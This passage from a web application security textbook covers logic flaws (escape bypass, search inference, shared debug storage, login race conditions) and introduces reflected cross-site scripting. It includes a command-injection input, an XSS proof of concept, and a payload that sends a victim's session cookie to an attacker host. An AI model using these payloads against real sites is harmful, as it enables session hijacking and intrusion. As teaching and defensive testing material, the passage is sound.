vide a means for the attacker to defeat their sanitizing mechanism altogether.

Suppose an attacker supplies the following input to the vulnerable function:

foo\;ls

The application applies the relevant escaping, as described previously, and

so the attacker’s input becomes:

foo\\;ls

When this data is passed as an argument to the operating system command,

the shell interpreter treats the first backslash as the escape character, and so

treats the second backslash as a literal backslash — not an escape character but

part of the argument itself. It then encounters a semicolon that is apparently

not escaped. It treats this as a command separator and so goes on to execute

the injected command supplied by the attacker.
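The effect can be checked without invoking a real shell. The sketch below is a simplified model, not the product's code: `flawed_escape` applies the escaping described in the text, `fixed_escape` is a hypothetical variant that also escapes the backslash, and `unescaped_metachars` approximates unquoted shell parsing with the single rule that a backslash makes the next character literal.

```python
METACHARS = set(";|&<>` \n")

def flawed_escape(value):
    """Backslash-escape shell metacharacters, but not the backslash itself."""
    return "".join("\\" + ch if ch in METACHARS else ch for ch in value)

def fixed_escape(value):
    """Same as above, with the backslash added to the escaped set."""
    return "".join(
        "\\" + ch if ch in METACHARS or ch == "\\" else ch for ch in value
    )

def unescaped_metachars(text):
    """Return the metacharacters that are still special after escaping."""
    found, i = [], 0
    while i < len(text):
        if text[i] == "\\":
            i += 2  # skip the backslash and the character it escapes
            continue
        if text[i] in METACHARS:
            found.append(text[i])
        i += 1
    return found

attack = "foo\\;ls"                    # the seven characters foo\;ls
escaped = flawed_escape(attack)        # becomes foo\\;ls
live = unescaped_metachars(escaped)    # the semicolon is live again
```

With `fixed_escape`, the same input leaves no live metacharacters in this model. Passing arguments to the command as a list, with no shell involved, avoids the problem altogether where the platform allows it.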

HACK STEPS

Whenever you are probing an application for command injection and other

flaws, having attempted to insert the relevant metacharacters into the data you

control, always try placing a backslash immediately before each such character,

to test for the logic flaw described previously.

NOTE This same flaw can be found in some defenses against cross-site

scripting attacks (see Chapter 12). When user-supplied input is copied directly

into the value of a string variable in a piece of JavaScript, this value is

encapsulated within quotation marks. To defend themselves against XSS, many

applications use backslashes to escape any quotation marks that appear within

the user’s input. However, if the backslash character itself is not escaped, then

an attacker can submit \' to break out of the string and so take control of the

script. This exact bug was found in early versions of the Ruby on Rails

framework, in the escape_javascript function.

Example 9: Abusing a Search Function

The authors encountered this logic flaw in an application providing subscription-

based access to financial news and information. The same vulnerability was later

found in two completely unrelated applications, illustrating the subtle and per-

vasive nature of many logic flaws.

The Functionality

The application provided access to a huge archive of historical and current

information, including company reports and accounts, press releases, market

analyses, and the like. Most of this information was accessible only to paying

subscribers.

The application provided a powerful and fine-grained search function,

which could be accessed by all users. When an anonymous user performed

a query, the search function returned links to all documents that matched the

query. However, the user would be required to subscribe in order to retrieve

any of the actual protected documents that their query returned. The applica-

tion’s owners regarded this behavior as a useful marketing tactic.

The Assumption

The application’s designer assumed that users could not use the search func-

tion to extract any useful information without paying for it. The document

titles listed in the search results were typically cryptic — for example, “Annual

Results 2006,” “Press Release 08-03-2007,” and so on.

The Attack

Because the search function indicated the number of documents that matched

a given query, a wily user could issue a large number of queries and use infer-

ence to extract information from the search function that would normally need

to be paid for. For example, the following queries could be used to zero in on

the contents of an individual protected document:

wahh consulting

>> 276 matches

wahh consulting “Press Release 08-03-2007” merger

>> 0 matches

wahh consulting “Press Release 08-03-2007” share issue

>> 0 matches

wahh consulting “Press Release 08-03-2007” dividend

>> 0 matches

wahh consulting “Press Release 08-03-2007” takeover

>> 1 match

wahh consulting “Press Release 08-03-2007” takeover haxors inc

>> 0 matches

wahh consulting “Press Release 08-03-2007” takeover uberleet ltd

>> 0 matches

wahh consulting “Press Release 08-03-2007” takeover script kiddy corp

>> 0 matches

wahh consulting “Press Release 08-03-2007” takeover ngs

>> 1 match

wahh consulting “Press Release 08-03-2007” takeover ngs announced

>> 0 matches

wahh consulting “Press Release 08-03-2007” takeover ngs cancelled

>> 0 matches

wahh consulting “Press Release 08-03-2007” takeover ngs completed

>> 1 match

Although the user cannot view the actual document itself, with sufficient

imagination and use of scripted requests, he may be able to build up a fairly

accurate understanding of its contents.
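The inference loop behind these queries is simple to script. The sketch below stands in for the real search function with a hypothetical in-memory archive and substring matching; the document bodies and helper names are invented for illustration. The point is that a match count alone is enough to test guesses about protected content.

```python
# Hypothetical protected archive: title -> body text.
ARCHIVE = {
    "Press Release 08-03-2007": "wahh consulting takeover of ngs completed",
    "Annual Results 2006": "wahh consulting annual results",
}

def match_count(query_terms):
    """Stand-in for the search function: only a hit count is returned."""
    return sum(
        all(term in (title + " " + body) for term in query_terms)
        for title, body in ARCHIVE.items()
    )

def infer_terms(fixed_terms, candidates):
    """Keep each candidate word that still yields at least one match."""
    return [w for w in candidates if match_count(fixed_terms + [w]) > 0]

guesses = ["merger", "dividend", "takeover", "ngs", "cancelled", "completed"]
confirmed = infer_terms(["Press Release 08-03-2007"], guesses)
```

Against a real application, each call to `match_count` would be an HTTP request, so the practical limits are the size of the guess list and any rate limiting the application applies.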

TIP In certain situations, an ability to leach information via a search function

in this way may be critical to the security of the application itself — effectively

disclosing details of administrative functions, passwords, and technologies

in use.

Example 10: Snarfing Debug Messages

The authors encountered this logic flaw in a web application used by a finan-

cial services company.

The Functionality

The application was only recently deployed and like much new software still

contained a number of functionality-related bugs. Intermittently, various oper-

ations would fail in an unpredictable way, and users would be presented with

an error message.

To facilitate the investigation of errors, developers decided to include

detailed verbose information in these messages, including the following

details:

■ The user’s identity.

■ The token for the current session.

■ The URL being accessed.

■ All of the parameters supplied with the request which generated the

error.

Generating these messages had proved useful when helpdesk personnel

attempted to investigate and recover from system failures, and was helping to

iron out the remaining functionality bugs.

The Assumption

Despite the usual warnings from security advisers that verbose debug mes-

sages of this kind could potentially be misused by an attacker, the developers

reasoned that they were not opening up any security vulnerability. All of the

information contained within the debugging message could be readily

obtained by the user, by inspecting the requests and responses processed by

her browser. The messages did not include any details about the actual failure,

such as stack traces, and so could not conceivably assist in formulating an

attack against the application.

The Attack

Despite their reasoning about the contents of the debug messages, the devel-

opers’ assumption was flawed because of mistakes they made in implement-

ing the creation of debugging messages.

When an error occurred, a component of the application gathered all of the

required information and stored it. The user was issued with an HTTP redirect

to a URL that displayed this stored information. The problem was that the

application’s storage of debug information, and user access to the error mes-

sage, was not session-based. Rather, the debugging information was stored in

a static container, and the error message URL always displayed the informa-

tion which was last placed into this container. Developers had assumed that

users following the redirect would, therefore, see only the debug information

relating to their error.

In fact, in this situation, ordinary users would occasionally be presented

with the debugging information relating to a different user’s error, because the

two errors had occurred almost simultaneously. But aside from questions

about thread safety (see the next example), this was not simply a race condi-

tion. An attacker who discovered the way in which the error mechanism func-

tioned could simply poll the message URL repeatedly, and log the results each

time they changed. Over a period of a few hours, this log would contain

sensitive data about numerous application users:

■ A set of usernames that could be used in a password-guessing attack.

■ A set of session tokens that could be used to hijack sessions.

■ A set of user-supplied input, which may contain passwords and other

sensitive items.

The error mechanism, therefore, presented a critical security threat. Because

administrative users sometimes received these detailed error messages, an

attacker monitoring error messages would soon obtain sufficient information

to compromise the entire application.
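The storage mistake and the polling attack can both be shown in a short sketch. The `ErrorPage` class, its method names, and the sample values are assumptions. The sketch models only the two facts given in the text: debug data sits in a single static container, and the error URL returns whatever was stored last.

```python
class ErrorPage:
    # Flaw: one class-level slot shared by every user of the application.
    last_debug = None

    @classmethod
    def record(cls, user, token, params):
        cls.last_debug = {"user": user, "token": token, "params": params}

    @classmethod
    def show(cls):
        # No session check: whoever asks sees the most recent error.
        return cls.last_debug

def poll(seen):
    """Attacker's loop body: log the message whenever it changes."""
    current = ErrorPage.show()
    if current is not None and (not seen or seen[-1] != current):
        seen.append(current)
    return seen

seen = []
ErrorPage.record("alice", "tok-a", {"pin": "1234"})  # alice hits an error
poll(seen)
poll(seen)                                           # unchanged, not logged twice
ErrorPage.record("bob", "tok-b", {})                 # bob hits an error
poll(seen)
```

The attacker's log now holds both users' identities and session tokens. Storing the debug record in the session of the user who triggered the error would confine each message to its owner.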

HACK STEPS

■ To detect a flaw of this kind, first catalog all of the anomalous events and

conditions that can be generated and that involve interesting user-spe-

cific information being returned to the browser in an unusual way, such

as a debugging error message.

■ Using the application as two users in parallel, systematically engineer

each condition using one or both users, and determine whether the other

user is affected in each case.

Example 11: Racing against the Login

This logic flaw has affected several major applications in the recent past.

The Functionality

The application implemented a robust, multistage login process in which

users were required to supply several different credentials to gain access.

The Assumption

The authentication mechanism had been subject to numerous design reviews

and penetration tests. The owners were confident that no feasible means

existed of attacking the mechanism to gain unauthorized access.

The Attack

In fact, the authentication mechanism contained a subtle flaw. Very occasion-

ally, when a customer logged in, he gained access to the account of a com-

pletely different user, enabling him to view all of that user’s financial details,

and even make payments from the other user’s account. The application’s

behavior appeared initially to be completely random: the user had not per-

formed any unusual action in order to gain unauthorized access, and the

anomaly did not recur on subsequent logins.

After some investigation, the bank discovered that the error was occurring

when two different users logged in to the application at precisely the same

moment. It did not occur on every such occasion — only on a subset of them.

The root cause was that the application was briefly storing a key identifier

about each newly authenticated user within a static (nonsession) variable.

After being written, this variable’s value was read back an instant later. If a dif-

ferent thread (processing another login) had written to the variable during this

instant, the earlier user would land in an authenticated session belonging to

the subsequent user.

The vulnerability arose from the same kind of mistake as in the error mes-

sage example described previously: the application was using static storage to

hold information that ought to have been stored on a per-thread or per-session

basis. However, the present example is far more subtle to detect, and is more

difficult to exploit because it cannot be reliably reproduced.
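The root cause described above can be sketched in a few lines. This is a minimal illustration, not the bank's actual code: the class names, the `after_write` hook, and the `race` helper are all hypothetical, and the hook exists only to force the unlucky interleaving that would otherwise occur very rarely.

```python
import threading


class SharedStateLogin:
    """Flawed sketch: the newly authenticated user is held in class-level
    (static) storage that every login thread shares."""

    current_user = None

    def login(self, username, after_write=None):
        SharedStateLogin.current_user = username  # write to shared storage
        if after_write:
            after_write()  # hypothetical hook: widens the race window
        # Read back "an instant later"; another thread may have written since.
        return {"session_for": SharedStateLogin.current_user}


class LocalStateLogin:
    """Safer sketch: the identifier lives in a local variable, so each
    thread only ever sees its own value."""

    def login(self, username, after_write=None):
        user = username
        if after_write:
            after_write()
        return {"session_for": user}


def race(login_impl):
    """Force the interleaving: alice writes, bob logs in, alice reads back."""
    alice_wrote = threading.Event()
    bob_done = threading.Event()
    results = {}

    def alice():
        def pause():
            alice_wrote.set()
            bob_done.wait(timeout=5)

        results["alice"] = login_impl.login("alice", after_write=pause)

    def bob():
        alice_wrote.wait(timeout=5)
        results["bob"] = login_impl.login("bob")
        bob_done.set()

    threads = [threading.Thread(target=alice), threading.Thread(target=bob)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results
```

Calling `race(SharedStateLogin())` leaves alice holding a session for bob, whereas `race(LocalStateLogin())` gives each user their own session. In a real application the window is not held open artificially, which is why the anomaly appears only occasionally.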

Flaws of this kind are known as “race conditions” because they involve a

vulnerability that arises for a brief period of time during certain specific cir-

cumstances. Because the vulnerability exists only for a short time, an attacker

faces a “race” to exploit it before the application closes it again. In cases where

the attacker is local to the application, it is often possible to engineer the exact

circumstances in which the race condition arises, and reliably exploit the vul-

nerability during the available window. Where the attacker is remote to the

application, this is normally much harder to achieve.

A remote attacker who understood the nature of the vulnerability could

conceivably have devised an attack to exploit it, by using a script to log in con-

tinuously and check the details of the account accessed. But the tiny window

during which the vulnerability could be exploited meant that a huge number

of requests would be required.

It was not surprising that the race condition was not discovered during nor-

mal penetration testing. The conditions in which it arose came about only when

the application gained a large enough user base for random anomalies to occur,

which were reported by customers. However, a close code review of the authen-

tication and session management logic would have identified the problem.

HACK STEPS

Performing remote black-box testing for subtle thread safety issues of this kind

is not straightforward and should be regarded as a specialized undertaking,

probably necessary only in the most security-critical of applications.

■ Target selected items of key functionality, such as login mechanisms,

password change functions, and funds transfer processes.

■ For each function tested, identify a single request, or a small number of

requests, that can be used by a given user to perform a single action.

Also find the simplest means of confirming the result of the action — for

example, verifying that a given user’s login has resulted in access to their

own account information.

■ Using several high-spec machines, accessing the application from differ-

ent network locations, script an attack to perform the same action

repeatedly on behalf of several different users. Confirm whether each

action has the expected result.

■ Be prepared for a large volume of false positives. Depending on the scale

of the application’s supporting infrastructure, this activity may well

amount to a load test of the installation. Anomalies may be experienced

for reasons that have nothing to do with security.
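The scripted part of these steps might look something like the following sketch. It assumes you have already written a function (called `perform_action` here, a hypothetical name) that carries out the chosen action as a given user and returns the identity that the application reports afterwards. The harness itself uses only the Python standard library.

```python
from concurrent.futures import ThreadPoolExecutor


def find_anomalies(perform_action, users, rounds=50, workers=8):
    """Run perform_action(user) many times in parallel and return every
    (expected_user, observed_user) pair where the two differ."""
    # Interleave the users so that different accounts are active together.
    jobs = [user for _ in range(rounds) for user in users]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        observed = list(pool.map(perform_action, jobs))  # order is preserved
    return [(user, seen) for user, seen in zip(jobs, observed) if seen != user]
```

For example, `find_anomalies(login_and_read_owner, ["alice", "bob"])` would return an empty list if every login landed in the correct account, where `login_and_read_owner` is your own request-sending function. Any pair that is returned still needs manual investigation, because load-related failures will produce mismatches that have nothing to do with thread safety.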

Avoiding Logic Flaws

Just as there is no unique signature by which logic flaws in web applications

can be identified, there is also no silver bullet with which you can be protected.

For example, there is no equivalent to the straightforward advice of using a

safe alternative to a dangerous API. Nevertheless, there is a range of good

practice that can be applied to significantly reduce the risk of logical flaws

appearing within your applications:

■ Ensure that every aspect of the application’s design is clearly documented in sufficient detail for an outsider to understand every assumption made by the designer. All such assumptions should be explicitly recorded within the design documentation.

■ Mandate that all source code is clearly commented to include the following information throughout:

  ■ The purpose and intended uses of each code component.

  ■ The assumptions made by each component about anything that is outside of its direct control.

  ■ References to all client code that makes use of the component. Clear documentation to this effect could have prevented the logic flaw within the online registration functionality. (Note: “client” here refers not to the user end of the client-server relationship but to other code for which the component being considered is an immediate dependency.)

■ During security-focused reviews of the application design, reflect upon every assumption made within the design, and try to imagine circumstances in which each assumption might be violated. Focus particularly on any assumed conditions that could conceivably be within the control of application users.

■ During security-focused code reviews, think laterally about two key areas: (a) the ways in which unexpected user behavior and input will be handled by the application, and (b) the potential side effects of any dependencies and interoperation between different code components and different application functions.

In relation to the specific examples of logic flaws we have described, a num-

ber of individual lessons can be learned:

■ Be constantly aware that users control every aspect of every request (see Chapter 1). They may access multistage functions in any sequence. They may submit parameters that the application did not ask for. They may omit certain parameters altogether, not just interfere with the parameters’ values.

■ Drive all decisions regarding a user’s identity and status from her session (see Chapter 8). Do not make any assumptions about the user’s privileges on the basis of any other feature of the request, including the fact that it occurs at all.

■ When implementing functions that update session data on the basis of input received from the user, or actions performed by the user, reflect carefully on any impact that the updated data may have on other functionality within the application. Be aware that unexpected side effects may occur in entirely unrelated functionality written by a different programmer or even a different development team.

■ If a search function is liable to index sensitive data that some users are not authorized to access, ensure that the function does not provide any means for those users to infer information based on search results. If appropriate, maintain several search indexes based on different levels of user privilege, or perform dynamic searches of information repositories with the privileges of the requesting user.

■ Be extremely wary of implementing any functionality that enables any user to delete items from an audit trail. Also, consider the possible impact of a high-privileged user creating another user of the same privilege in heavily audited applications and dual-authorization models.

■ When carrying out checks based on numeric business limits and thresholds, perform strict canonicalization and data validation on all user input before processing it. If negative numbers are not expected, explicitly reject requests that contain them.

■ When implementing discounts based on order volumes, ensure that orders are finalized before actually applying the discount.

■ When escaping user-supplied data before passing to a potentially vulnerable application component, always be sure to escape the escape character itself, or the entire validation mechanism may be broken.

■ Always use appropriate storage to maintain any data that relates to an individual user, either in the session or in the user’s profile.
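Two of the lessons above, the numeric limit check and the escaping of the escape character, lend themselves to a short sketch. The function names, the error messages, and the particular set of metacharacters are illustrative assumptions; a real application would choose them to suit the component being protected.

```python
from decimal import Decimal, InvalidOperation


def parse_amount(raw, limit):
    """Canonicalize a user-supplied amount first, then apply the limit."""
    try:
        amount = Decimal(raw.strip())
    except InvalidOperation:
        raise ValueError("amount is not a number")
    if not amount.is_finite():  # rejects NaN and Infinity
        raise ValueError("amount must be finite")
    if amount <= 0:  # negative values are not expected, so reject them
        raise ValueError("amount must be positive")
    if amount > limit:
        raise ValueError("amount exceeds the permitted limit")
    return amount


def escape_metachars(value, metachars=";|&", escape="\\"):
    """Prefix each metacharacter with the escape character, treating the
    escape character itself as something that must also be escaped."""
    out = []
    for ch in value:
        if ch == escape or ch in metachars:
            out.append(escape)
        out.append(ch)
    return "".join(out)
```

With this approach, `parse_amount("-500", Decimal("10000"))` raises an error rather than slipping under the threshold. An input of `foo\;ls` comes out of `escape_metachars` with both the backslash and the semicolon escaped, so the attacker's own backslash cannot neutralize the one added by the filter.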

Chapter Summary

Attacking an application’s logic involves a mixture of systematic probing and

lateral thinking. As we have identified, there are various key checks that you

should always carry out to test the application’s behavior in response to unex-

pected input. These include removing parameters from requests, using forced

browsing to access functions out of sequence, and submitting parameters to

different locations within the application. Often, the way an application

responds to these actions will point towards some defective assumption that

you can violate, to malicious effect.

In addition to these basic tests, the most important challenge when probing

for logic flaws is to try to get inside the mind of the developer. You need to

understand what they were trying to achieve, what assumptions they proba-

bly made, what shortcuts they are likely to have taken, and what mistakes they

may have committed. Imagine that you were working to a tight deadline, wor-

rying primarily about functionality rather than security, trying to add a new

function to an existing code base, or using poorly documented APIs written by

someone else. In that situation, what would you get wrong, and how could it

be exploited?

Questions

Answers can be found at www.wiley.com/go/webhacker.

1. What is forced browsing, and what kind of vulnerabilities can it be

used to identify?

2. An application applies various global filters on user input, designed to

prevent different categories of attack. To defend against SQL injection, it

doubles up any single quotation marks that appear in user input. To

prevent buffer overflow attacks against some native code components,

it truncates any overlong items to a reasonable limit.

What might go wrong with these filters?

3. What steps could you take to probe a login function for fail-open condi-

tions? (Describe as many different tests as you can think of.)

4. A banking application implements a multistage login mechanism that is

intended to be highly robust. At the first stage, the user enters a user-

name and password. At the second stage, the user enters the changing

value on a physical token that they possess, and the original username

is resubmitted in a hidden form field.

What logic flaw should you immediately check for?

5. You are probing an application for common categories of vulnerability

by submitting crafted input. Frequently, the application returns verbose

error messages containing debugging information. Occasionally, these

messages relate to errors generated by other users. When this happens,

you are unable to reproduce the behavior a second time. What logic

flaw may this indicate, and how should you proceed?

CHAPTER 12

Attacking Other Users

The majority of interesting attacks against web applications involve targeting the server-side application itself. Many of these attacks do, of course, impinge upon other users; an SQL injection attack that steals other users’ data is one example. But the essential methodology of the attacker is to interact with the server in unexpected ways in order to perform unauthorized actions and access unauthorized data.

The attacks described in this chapter are in a different category, because the primary target of the attacker is the application’s other users. All of the relevant vulnerabilities still exist within the server-side application. However, the attacker leverages some aspect of the application’s behavior in order to carry out malicious actions against another end user. These actions may result in some of the same effects that we have already examined, such as session hijacking, unauthorized actions, and the disclosure of personal data. They may also result in other undesirable outcomes, such as logging of keystrokes or execution of arbitrary commands on users’ computers.

Other areas of software security have witnessed a gradual shift in focus from server-side to client-side attacks in recent years. To take one example, Microsoft used to announce serious security vulnerabilities within their server products on a frequent basis. Although numerous client-side flaws were also disclosed, these received much less attention because servers presented a much more appealing target for most attackers. In just a few years, this situation has changed markedly. At the time of this writing, no critical security vulnerabilities have been publicly announced in Microsoft’s IIS 6 web server. However, in the time since this product was first released, a very large number of flaws have been disclosed in Microsoft’s Internet Explorer browser. As the general awareness of security threats has evolved, the front line of the battle between software developers and hackers has moved from the server to the client.

Although web application security is still some way behind the curve just

described, the same trend can be detected. A decade ago, most applications on

the Internet were riddled with critical flaws like command injection, which

could be easily found and exploited by any attacker with a bit of knowledge.

Although many such vulnerabilities still exist today, they are slowly becoming

less widespread and more difficult to exploit. Meanwhile, even the most

security-critical applications still contain many easily discoverable client-side

flaws. A key focus of recent research has been on this kind of vulnerability,

with defects such as session fixation first being discussed many years after

most categories of server-side bugs were widely known about. Media focus on

web security is predominantly concerned with client-side attacks, with such

terms as spyware, phishing, and Trojans being common currency to many

journalists who have never heard of SQL injection or path traversal. And

attacks against web application users are an increasingly lucrative criminal

business. Why go to the trouble of breaking into an Internet bank, when it has

10 million customers and you can compromise 1% of these in a relatively crude

attack that requires little skill or elegance?

Attacks against other application users come in many forms and manifest a

variety of subtleties and nuances that are frequently overlooked. They are also

less well understood in general than the primary server-side attacks, with dif-

ferent flaws being conflated or neglected even by some seasoned penetration

testers. We will describe all of the different vulnerabilities that are commonly

encountered and spell out the practical steps you need to perform to identify

and exploit each of these.

Cross-Site Scripting

Cross-site scripting (or XSS) is the Godfather of attacks against other users. It

is by some measure the most prevalent web application vulnerability found in

the wild, afflicting literally the vast majority of live applications, including

some of the most security-critical applications on the Internet, such as those

used by online banks.

Opinions vary as to the seriousness of XSS vulnerabilities. Ask many a

hacker or professional pen tester, and they will tell you, “Cross-site scripting is

lame.” And in one sense it is. XSS vulnerabilities are often trivial to identify

and are so widespread that anyone with a browser can find an XSS bug some-

where in a matter of minutes. The Bugtraq mailing list is congested with atten-

tion seekers posting XSS bugs in unheard-of software. And in plenty of cases,

XSS vulnerabilities are of minimal significance — not exploitable to do any-

thing particularly worthwhile.

In the archetypal battle between a lone hacker and a target web application,

XSS bugs usually (though not always) provide no help in the hacker’s quest to

compromise the system. Compared with a juicy bug like SQL injection, path

traversal, or broken access controls, cross-site scripting is often “lame” indeed.

However, the significance of any bug is dependent upon both its context

and the objectives of the person who might exploit it. An XSS bug in a banking

application is considerably more serious than one in a brochure-ware site.

Even if the bug does not enable a hacker to break in, it may still be gold dust to

a phisherman seeking to hoodwink millions of unwitting users.

Further, there are many situations in which XSS does represent a critical

security weakness within an application. It can often be combined with other

vulnerabilities to devastating effect. In some situations, an XSS attack can be

turned into a virus or a self-propagating worm. Attacks of this kind are cer-

tainly not lame.

XSS vulnerabilities should always be viewed in perspective, by reference to

the context in which they appear, and in relation to other serious attacks

against web applications and other computer systems. We need to treat them

seriously, but avoid getting over-excited. Whatever your opinion of the threat

posed by XSS vulnerabilities, it seems unlikely that Al Gore will be producing

a movie about them any time soon.

COMMON MYTH “You can’t own a web application via XSS.”

The authors have owned numerous applications using only XSS attacks. In the

right situation, a skillfully exploited XSS vulnerability can lead directly to a

complete compromise of the application. We will show you how.

Reflected XSS Vulnerabilities

A very common example of XSS occurs when an application employs

a dynamic page to display error messages to users. Typically, the page takes a

parameter containing the text of the message, and simply renders this text

back to the user within its response. This type of mechanism is convenient for

developers, because it allows them to invoke a customized error page from

anywhere in the application, without needing to hard-code individual mes-

sages within the error page itself.

For example, consider the following URL, which returns the error message

shown in Figure 12-1:

https://wahh-app.com/error.php?message=Sorry%2c+an+error+occurred

Figure 12-1: A dynamically generated error message

Looking at the HTML source for the returned page, we can see that the application is simply copying the value of the message parameter in the URL and inserting this into the error page template at the appropriate place:

<p>Sorry, an error occurred.</p>

This behavior of taking user-supplied input and inserting it into the HTML

of the server’s response is one of the signatures of XSS vulnerabilities, and if no

filtering or sanitization is being performed, then the application is certainly

vulnerable. Let’s see how.

The following URL has been crafted to replace the error message with a

piece of JavaScript that generates a pop-up dialog:

https://wahh-app.com/error.php?message=<script>alert('xss');</script>

Requesting this URL generates an HTML page that contains the following in

place of the original message:

<p><script>alert('xss');</script></p>

And sure enough, when the page is rendered within the user’s browser, the

pop-up message appears, as shown in Figure 12-2.

Figure 12-2: A proof-of-concept XSS exploit

Performing this simple test serves to verify two important things. First, the contents of the message parameter can be replaced with arbitrary data that gets returned to the browser. Second, whatever processing the server-side application is performing on this data (if any), it is not sufficient to prevent us from supplying JavaScript code that is executed when the page is displayed in the browser.
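To make the behavior concrete, the following sketch models the error page in Python rather than in the PHP that the example application presumably uses. The template and both function names are assumptions made for illustration; `html.escape` is the standard library's HTML-encoding routine and is shown as one possible form of sanitization.

```python
import html

# Hypothetical stand-in for the error page template.
ERROR_TEMPLATE = "<p>{message}</p>"


def render_error_unsafe(message):
    """Copies the parameter into the page unmodified, as the example does."""
    return ERROR_TEMPLATE.format(message=message)


def render_error_escaped(message):
    """HTML-encodes the parameter so that the browser treats it as text."""
    return ERROR_TEMPLATE.format(message=html.escape(message))
```

Passing the proof-of-concept payload to `render_error_unsafe` reproduces the response shown earlier, with a live script element inside the paragraph. Passing it to `render_error_escaped` yields only encoded entities, which the browser displays rather than executes.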

This type of simple XSS bug accounts for approximately 75% of the XSS vul-

nerabilities that exist in real-world web applications. It is often referred to as

reflected XSS because exploiting the vulnerability involves crafting a request

containing embedded JavaScript which is reflected back to any user who makes

the request. The attack payload is delivered and executed via a single request

and response. For this reason, it is also sometimes referred to as first-order XSS.

Exploiting the Vulnerability

As you will see, XSS vulnerabilities can be exploited in many different ways to

attack other users of an application. One of the simplest attacks, and the one

that is most commonly envisaged to explain the potential significance of XSS

flaws, results in the attacker capturing the session token of an authenticated

user. Hijacking the user’s session gives the attacker access to all of the data and

functionality to which the user is authorized (see Chapter 7).

The steps involved in this attack are illustrated in Figure 12-3.

Figure 12-3: The steps involved in a reflected XSS attack (diagram showing the User, the Attacker, and the Application, connected by the seven numbered steps described in the text)

1. The user logs in to the application as normal, and is issued with a

cookie containing a session token:

Set-Cookie: sessId=184a9138ed37374201a4c9672362f12459c2a652491a3

2. Through some means (described in detail later), the attacker feeds the

following URL to the user:

https://wahh-app.com/error.php?message=<script>var+i=new+Image;
+i.src="http://wahh-attacker.com/"%2bdocument.cookie;</script>

As in the previous example, which generated a dialog message, this

URL contains embedded JavaScript. However, the attack payload in

this case is more malicious.

3. The user requests from the application the URL fed to them by the

attacker.

4. The server responds to the user’s request. As a result of the XSS vulner-

ability, the response contains the JavaScript created by the attacker.

5. The attacker’s JavaScript is received by the user’s browser, which

executes it in the same way it does any other code received from the

application.

6. The malicious JavaScript created by the attacker is:

var i=new Image; i.src="http://wahh-attacker.com/"+document.cookie;

This code causes the user’s browser to make a request to wahh-attacker.com, which is a domain owned by the attacker. The request contains the user’s current session token for the application:

GET /sessId=184a9138ed37374201a4c9672362f12459c2a652491a3 HTTP/1.1

Host: wahh-attacker.com

7. The attacker monitors requests to wahh-attacker.com and receives the

user’s request. He uses the captured token to hijack the user’s session,

gaining access to that user’s personal information, and performing arbi-

trary actions “as” the user.
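It is worth seeing why the URL in step 2 turns into the script in step 6. The sketch below applies standard form-style URL decoding to the message parameter: each `+` becomes a space, and `%2b` becomes the literal `+` that joins the attacker's URL to `document.cookie`. The helper names are hypothetical, and the decoding shown is what a typical server-side framework would do, not necessarily the exact behavior of the example application.

```python
from urllib.parse import urlsplit, unquote_plus

# The crafted URL from step 2, written with plain ASCII quotes.
CRAFTED_URL = (
    "https://wahh-app.com/error.php?message=<script>var+i=new+Image;"
    '+i.src="http://wahh-attacker.com/"%2bdocument.cookie;</script>'
)


def decoded_message(url):
    """Return the value of the message parameter after URL decoding."""
    query = urlsplit(url).query
    name, _, raw_value = query.partition("=")  # split on the first "=" only
    if name != "message":
        raise ValueError("expected the query string to start with message=")
    return unquote_plus(raw_value)


def exfiltration_path(cookie_string):
    """Path requested from the attacker's host: '/' plus document.cookie."""
    return "/" + cookie_string
```

`decoded_message(CRAFTED_URL)` returns the script exactly as listed in step 6, wrapped in its script tags. Had the attacker written a bare `+` in place of `%2b`, it would have been decoded to a space and the concatenation would have been lost. `exfiltration_path` simply mirrors the request line shown in step 6.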

NOTE As you saw in Chapter 6, some applications store a persistent cookie

which effectively reauthenticates the user on each visit — for example, to

implement a “remember me” function. In this situation, step 1 of the preceding

process is not necessary. The attack will succeed even at times when the target

user is not actively using or logged in to the application. Because of this,

applications that use cookies in this way leave themselves more exposed in

terms of the impact of any XSS flaws that they contain.

After following all of this, you may be forgiven for wondering why, if the attacker is able to induce the user to visit a URL of his choosing, he bothers with the whole rigmarole of transmitting his malicious JavaScript via the XSS bug in the vulnerable application. Why doesn’t he simply host a malicious script on wahh-attacker.com and feed the user a direct link to this script? Wouldn’t this script execute in just the same way as it does in the example described?

In fact, there are two important reasons why the attacker goes to the trouble of exploiting the XSS vulnerability. The first and most important reason is that the attacker’s objective is not simply to execute an arbitrary script but to capture the session token of the user. Browsers do not let just any old script access a site’s cookies; otherwise, session hijacking would be trivial. Rather, cookies can be accessed only by the site that issued them: they are submitted in HTTP requests back to the issuing site only, and they can be accessed via JavaScript contained within or loaded by a page returned by that site only. Hence, if a script residing on wahh-attacker.com queries document.cookie, it will not obtain the cookies issued by wahh-app.com, and the hijacking attack will fail.

The reason why the attack which exploits the XSS vulnerability is successful is that, as far as the user’s browser is concerned, the attacker’s malicious JavaScript was sent to it by wahh-app.com. When the user requests the attacker’s URL, the browser makes a request to https://wahh-app.com/error.php, and the application returns a page containing some JavaScript. As with any JavaScript received from wahh-app.com, the browser executes this script within the security context of the user’s relationship with wahh-app.com. This is the reason why the attacker’s script, although it actually originates elsewhere, is able to gain access to the cookies issued by wahh-app.com. This is also the reason why the vulnerability itself has become known as cross-site scripting.

NOTE This restriction on the data that individual scripts can access is part of a more general same origin policy implemented by all modern browsers. This policy is designed to place barriers between different web sites that are being accessed by the browser, to prevent them from interfering with each other. The main features of the policy that you need to be aware of are:

■ A page residing on one domain can cause an arbitrary request to be made to another domain (for example, by submitting a form or loading an image), but it cannot itself process the data returned from that request.

■ A page residing on one domain can load a script from another domain and execute this within its own context. This is because scripts are assumed to contain code, rather than data, and so cross-domain access should not lead to disclosure of any sensitive information. As you will see, this assumption breaks down in certain situations, leading to cross-domain attacks.

■ A page residing on one domain cannot read or modify the cookies or other DOM data belonging to another domain (as described in the previous example).
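The comparison at the heart of this policy can be approximated in a few lines. The text above speaks loosely of domains; browsers generally compare the scheme, host, and port of the two URLs, and the sketch below follows that definition. It is a simplification for illustration only (the function names are hypothetical, and cookies have their own, somewhat different scoping rules).

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def origin(url):
    """Reduce a URL to the (scheme, host, port) triple used for comparison."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    port = parts.port or DEFAULT_PORTS.get(scheme)  # fill in the default port
    return (scheme, (parts.hostname or "").lower(), port)


def same_origin(url_a, url_b):
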